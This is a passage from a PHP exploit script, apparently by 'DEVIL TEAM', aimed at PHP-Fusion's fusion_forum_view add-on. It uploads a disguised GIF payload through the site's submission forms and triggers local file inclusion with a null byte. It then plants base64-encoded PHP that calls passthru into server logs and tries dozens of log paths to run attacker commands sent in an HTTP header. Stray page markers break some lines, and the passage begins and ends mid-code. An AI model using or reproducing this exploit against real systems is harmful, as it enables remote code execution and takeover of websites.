$data.=' -7d6224c08dc
Content-Disposition: form-data; name="photo_title"
DEVIL TEAM Hackers ;)
-7d6224c08dc
Content-Disposition: form-data; name="photo_description"
Hauru
-7d6224c08dc
Content-Disposition: form-data; name="photo_pic_file"; filename="hauru.gif" Content-Type: text/plain
'.$hauru.'
-7d6224c08dc
Content-Disposition: form-data; name="album_id"
1
-7d6224c08dc
Content-Disposition: form-data; name="submit_photo"
Add Photo
-7d6224c08dc
';
echo "upload Hauru!! (step 1) \n";
$packet ="POST ".$p."submit.php?stype=p HTTP/1.0\r\n";
$packet.="Cookie: fusion_user=".$user_id.".".md5($password).";\r\n";
$packet.="Cookie: fusion_visited=yes;\r\n";
$packet.="Content-Type: multipart/form-data; boundary= -7d6224c08dc\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
Trang 2$packet.=$data;
sendpacket($packet);
sleep(1);
echo "Hauru uploaded!! now remote code execution (step1) \n";
$packet ="GET ".$p."infusions/fusion_forum_view/fusion_forum_view.php?settin gs[locale]= / / / /images/photoalbum/submissions/hauru.gif%00 HTTP/1.1\r\n";
$packet.="HAURU: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacket($packet);
if (strstr($html,"Hauru"))
{
$temp=explode("Hauru",$html);
die($temp[1]);
}
$data.=' -7d6224c08dc
Content-Disposition: form-data; name="plik"; filename="hauru.gif"
Content-Type: text/plain
'.$hauru.'
-7d6224c08dc
Content-Disposition: form-data; name="download_title"
DEVIL TEAM
-7d6224c08dc
Content-Disposition: form-data; name="download_description"
http://www.rahim.webd.pl/
-7d6224c08dc
Content-Disposition: form-data; name="download_category"
1
Trang 3-7d6224c08dc
Content-Disposition: form-data; name="download_license"
Kacper
-7d6224c08dc
Content-Disposition: form-data; name="download_adres"
http://www.rahim.webd.pl/
-7d6224c08dc
Content-Disposition: form-data; name="download_os"
h4cking
-7d6224c08dc
Content-Disposition: form-data; name="download_version"
666
-7d6224c08dc
Content-Disposition: form-data; name="upload"
Send File
-7d6224c08dc
';
echo "upload Hauru!! (step 2) \n";
$packet ="POST ".$p."submit.php?stype=f HTTP/1.0\r\n";
$packet.="Cookie: fusion_user=".$user_id.".".md5($password).";\r\n";
$packet.="Cookie: fusion_visited=yes;\r\n";
$packet.="Content-Type: multipart/form-data; boundary= -7d6224c08dc\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacket($packet);
sleep(1);
Trang 4echo "Hauru uploaded!! now remote code execution (step2) \n";
$packet ="GET ".$p."infusions/fusion_forum_view/fusion_forum_view.php?settin gs[locale]= / / / /downloads/hauru.gif%00 HTTP/1.1\r\n";
$packet.="HAURU: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacket($packet);
if (strstr($html,"Hauru"))
{
$temp=explode("Hauru",$html);
die($temp[1]);
}
echo "insert evil code in logfiles (step3 - last) \r\n\r\n";
$calcifer = base64_decode("PD9waHAgb2JfY2xlYW4oKTsvL1J1Y2hvbXkgemFt ZWsgSGF1cnUgOy0pZWNobyIuL"
"i5IYWNrZXIuLkthY3Blci4uTWFkZS4uaW4uLlBvbGFuZCEhLi4uREVWSUwu VEVBTS"
"4udGhlLi5iZXN0Li5wb2xpc2guLnRlYW0uLkdyZWV0ei4uLiI7ZWNobyIuLi5 HbyB"
"UbyBERVZJTCBURUFNIElSQzogNzIuMjAuMTguNjo2NjY3ICNkZXZpbHRl YW0iO2Vj"
"aG8iLi4uREVWSUwgVEVBTSBTSVRFOiBodHRwOi8vd3d3LnJhaGltLndlYm QucGwvI"
"jtpbmlfc2V0KCJtYXhfZXhlY3V0aW9uX3RpbWUiLDApO2VjaG8gIkhhdXJ1Ijt wYX"
"NzdGhydSgkX1NFUlZFUltIVFRQX0hBVVJVXSk7ZGllOz8+");
$packet="GET ".$p.$calcifer." HTTP/1.0\r\n";
$packet.="User-Agent: ".$calcifer." Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: close\r\n\r\n";
sendpacket($packet);
Trang 5sleep(1);
$paths= array (
" / / / / /var/log/httpd/access_log",
" / / / / /var/log/httpd/error_log",
" /apache/logs/error.log",
" /apache/logs/access.log",
" / /apache/logs/error.log",
" / /apache/logs/access.log",
" / / /apache/logs/error.log",
" / / /apache/logs/access.log",
" / / / /apache/logs/error.log",
" / / / /apache/logs/access.log",
" / / / / /apache/logs/error.log",
" / / / / /apache/logs/access.log",
" /logs/error.log",
" /logs/access.log",
" / /logs/error.log",
" / /logs/access.log",
" / / /logs/error.log",
" / / /logs/access.log",
" / / / /logs/error.log",
" / / / /logs/access.log",
" / / / / /logs/error.log",
" / / / / /logs/access.log",
" / / / / /etc/httpd/logs/access_log",
" / / / / /etc/httpd/logs/access.log",
" / / / / /etc/httpd/logs/error_log",
" / / / / /etc/httpd/logs/error.log",
" / / / / /var/www/logs/access_log",
" / / / / /var/www/logs/access.log",
" / / / / /usr/local/apache/logs/access_log",
" / / / / /usr/local/apache/logs/access.log",
" / / / / /var/log/apache/access_log",
Trang 6" / / / / /var/log/apache/access.log",
" / / / / /var/log/access_log",
" / / / / /var/www/logs/error_log",
" / / / / /var/www/logs/error.log",
" / / / / /usr/local/apache/logs/error_log",
" / / / / /usr/local/apache/logs/error.log",
" / / / / /var/log/apache/error_log",
" / / / / /var/log/apache/error.log",
" / / / / /var/log/access_log",
" / / / / /var/log/error_log"
);
for ($i=0; $i<=count($paths)-1; $i++)
{
$a=$i+2;
echo "if register_globals = On\r\n";
echo "[".$a."] Check Path: ".$paths[$i]."\r\n";
echo "remote code execution in logifiles wait \n";
$packet ="GET ".$p."infusions/fusion_forum_view/fusion_forum_view.php?settin gs[locale]= / / / /".$paths[$i]."%00 HTTP/1.1\r\n";
$packet.="HAURU: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";